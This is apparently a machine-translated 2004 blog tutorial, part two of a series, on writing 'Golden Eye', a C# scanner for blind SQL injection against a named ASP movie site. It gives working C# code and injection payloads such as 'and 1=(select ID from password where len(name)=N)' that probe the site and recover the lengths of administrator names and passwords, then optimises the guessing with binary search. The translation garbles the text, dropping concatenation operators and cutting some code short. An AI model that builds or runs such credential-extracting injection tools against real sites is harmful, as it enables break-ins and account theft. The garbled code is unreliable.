Golden Eye - SQL Inject Scanner Production (2)
(Author: mikespook | Date: 2004-5-16 | Views: 51)
Keywords: golden eye, SQL injection, scanner, C # program preparation: I can finally start my favorite part (^ _ *). First of all, I want to say how I choose a programming tool. Many of my tools are written based on the DOTNET platform, written in C #. I think this lightweight tool should be written in a quick and convenient way. Of course, use C / C or even assembly to write. Your tool execution is very high. But isn't it too waste? Here I am going to talk about the topic. Have a friend as a message on my station saying how to learn. My point of view, language is just a carrier, an expression. I think everyone must have this experience: when describing an event or an object. Sometimes it is more accurate and convenient to use the language; sometimes it is better to use numeric description. It is this reason. Programming, in fact, you can use any language. But you should choose the most convenient and fastest. I personally oppose it, because I like the compilation, I use a middleware language such as C #, Java. Because I like C # or Java to reject C / C . This is extremely wrong! ! ! Ok, a lot of nonsense, I cheated a lot of contributions. I just want everyone to understand, because I have to work with C # today. Hey ... the old way, first give an interface to make you feel inductive. Today we have to design such a scanner (Figure 1): Place four text boxes on the interface: txtpage, txtname, txtpass, txtlog. As a target page input box, an administrator name display box, a password display box, and a log display box, respectively. Place two buttons: btntest, btnok. As the test button and the scan button. Then put some labels, beautify and explain the role. The interface is really simple. Below you can start coding. In order to access our target page, submit carefully prepared SQL injection code. We must access the network, use the HTTP protocol: Connection, send, receive, disconnect ..., etc., we just seem to say that the process of writing C / C . Yes, don't have to be so troublesome at C #. The entire URL operation class has been prepared in the DotNet class library. There are two classes under the namespace system.net: httpwebrequest, httpwebresponse. Request and response, respectively. For specific use, please see the following code: Public Bool getPage (String URL) {Try {// Value Temporary Variable R. BOOL R = false; / / Create an HttpWebRequest object for the specified URL. Httpwebrequest myhttpwebrequest = (httpwebrequest) WebRequest.create (URL); // Send httpwebRequest and waits for a response. Httpwebresponse myhttpwebresponse = (httpwebresponse) MyHttpWebRequest.getResponse (); // Detects HttpWebRequest When setting up temporary variables to TRUE when httpstatuscode.ok.
IF (myhttpwebresponse.statuscode == httpstatuscode.ok) r = true; // Release HttpWebRequest used resources. MyHttpWebResponse.close (); // Function Returns the temporary variable R. Return R;} catch (WebException E) {// Capture the webexception function Returns False. Return False;} catch (Exception E) {// Capture the Exception function Returns False. Return False;}} This function uses the address of the parameter URL into the target page. "Httpwebrequest myhttpwebrequest = (httpwebrequest) WebRequest.create (URL);" This sentence creates an HTTPWebRequest object and the target page. "Httpmebresponse myhttpwebresponse =" MyHttpWebRequest.getResponse (); "will send a request and establish an HTTPWebResponse object reception answer. The code will be stored in "MyHttpWebResponse.statuscode". The response code here is the code returned by the server. For example, 200 indicates that the access is successful, 404 indicates that the page does not exist, 500 represents the internal error of the server (Well, if the front SQL injection is injected, the injection is not successful, it is displayed 500 error? Yes, look down!) ... enumeration type The enumeration value in httpstatuscode is the server that is said above returns code. For example, "httpstatuscode.ok" represents the return code 200; "httpstatuscode. InternalServererror" represents the return code 500. Compare this response code "MyHttpWebResponse.statusCode" with the enumeration value "httpstatuscode.ok". If it is equal, then the explanation page is successful, the function returns true. If not, the function returns false. In the middle, I also use try ... catch ... to capture any possible errors. Any errors have returned false. Add this function to the class of the main form, while remembering the main form class to remember using the namespace System.NET. This is done in the most core part. Let's take a look at how this function is used.
Add the following code to the Click event of Button BTNTest: Private Void BTNTest_Click (Object Sender, System.EventArgs E) {if (this.getpage (txtpage.text "% 20and% 201 = 1")) txtlog.text = " This page may exist SQL injection vulnerability, try scan! "; Else txtlog.text =" This page does not exist SQL injection vulnerability, unable to scan! ";}" TXTPAGE.TEXT "% 20and% 201 = 1" "actually Is the synthesis SQL injection statement, to fill in the address of the target page in the TXTPAGE text box. Remember the "AND 1 = 1" mentioned earlier? Here is just the encoding of spaces with Unicode. Use the function getpage () to determine if the page can be accessed. If returns true, the page can be accessed. Note The injection test is successful, otherwise it will fail. After we write the getPage () function, let's take a look at how to really implement the scan. Here is the hardest place. But thinking about the process will be very interesting. I said when I explain SQL injection vulnerability, I can use "Movie.asp? Id = 123 and 1 = (select ID from password where len (name) = 10)" to determine whether the user name is equal to 10. In the "Golden Mei" system, the administrator name is the maximum length of 20. Then we can: "Movie.asp? Id = 123 and 1 = (Select ID from password where len (name) = 1)" "Movie.asp? Id = 123 and 1 = (Select ID from password where len) ) = 2) "" Movie.asp? Id = 123 and 1 = (select ID from password where len (name) = 3) "... Use this method to test the administrator name to the bottom. Of course, the same method can also be used to test the length of the password. However, "Jinmei" system sets the maximum length of 50. Write the following functions: Private Int getfieldlen (String Table, String Field, Int L, INT H) {for (INT I = L; I <= H; I ) IF (this.getpage (STRPAGE "% 20and% 201 = (Select% 20ID% 20FROM% 20 " Table "% 20where% 20LEN (" Field ") = " i.toTString () ") ") Return I; Return 0;} This function is very versatility Strong. There are four parameters: table is the table name we want to scan, in the "Jinmei" system is Table Password.
Field is the field name we have to test, such as the Name and PWD in the "Golden Mei" system. L and H two parameters represent the scope of scanning. That is, the minimum length and maximum length of the test. We can use this function to scan administrator names, such as GetFieldlen ("Password", "Name", 1, 20). At this time, the function returns the administrator name length. If the scan password length is: getfieldlen ("Password", "PWD", 1, 50). The function you see is the function in "Golden Eyes" 1.0, which can be said very slow. Because in order to compare the length of the field, we must compare one by one. For example, very extreme cases, the other party sets a 20-digit administrator name, 50 long passwords. Then the number of times is 20 times and 50 times to get the length we need. This algorithm is called "order look". The advantage of the algorithm is simple. Everyone can see a total of 4 lines of code, we have completed the look.
Unfortunately, although it is very simple, it is very simple, the execution efficiency is low! In "Golden Eyes" 1.1 I use "index look" to improve efficiency: private int getfieldlen (String Table, String Field, INT L, INT H) {INT INDEX1 = (L H) / 3; int index2 = (L H) * 2/3; IF (this.getPage (STRPAGE "% 20and% 201 = (select% 20ID% 20FROM% 20" Table "% 20where% 20LEN (" Field ") <" index1 .Tostring () ")"))) for (int i = L; i "Index Find" code is much more complicated! In fact, I will tell you what code "index lookup" is very clear. Let's see the following sequences: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20 this is what we want Find the sequence. In this first sentence and the second sentence of this search process: "INDEX1 = (L H) / 3;", "int index2 = (l h) * 2/3;" I have established actually two Index. For example, in the search of these 20 elements, the first index is 7, and the second index is 14. Everyone should notice that there is a conditional statement in front of each order lookup statement. This conditional statement is to determine the index. The process is approximately as follows: The determination field length is less than 7, if it is smaller, sequentially lookup 1-6. Otherwise, the determination field length is less than 14, if it is smaller, use sequential lookup to look for 7-13. Otherwise look up for 14-20 in order. This uses the index to narrow up 2/3. The lookup is small, and the number of times is reduced. The speed is of course a lot. But is this the fastest way? Let's take a look at the code below: Private int getfieldlen (String Table, String Field, INT L, INT H) {INT NLEN = 0; int low = L; int hig = H; int MID; int TMP = H - L; while ((Low <= HIG) && (TMP! = 0)) {MID = (Low HIG) / 2; IF (this.getPage (STRPAGE "% 20and% 201 = (SELECT% 20ID% 20FROM% 20" Table "% 20where% 20LEN (" Field ") <" Mid.Tostring () "))) HIG = MID - 1; Else IF (this.getPage "% 20and% 201 = SELECT% 20ID% 20FROM% 20 " Table "% 20where% 20LEN (" Field ")> " Mid.Tostring () ") ")") Low = MID 1; Else IF (this.getpage STRPAGE "% 20and% 201 = (SELECT% 20ID% 20FROM% 20" Table "% 20where% 20LEN (" Field ") =" mid.tostring () ")")) {Nlen = MID; Break;} --tmp;} Return Nlen;} Completely complicated, each cycle is used to calculate new values. This is "Folding".
